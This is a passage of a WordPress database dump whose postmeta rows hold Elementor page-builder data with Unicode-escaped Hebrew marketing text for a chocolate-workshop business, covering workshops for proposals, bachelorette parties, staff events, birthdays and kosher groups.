\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2270,429,'_elementor_edit_mode','builder'),(2271,429,'_elementor_template_type','wp-page'),(2272,429,'_elementor_version','2.7.5'),(2273,429,'_elementor_pro_version','2.7.3'),(2274,429,'_wp_page_template','elementor_header_footer'),(2275,429,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}');
INSERT INTO `xrx_postmeta` VALUES (2276,429,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 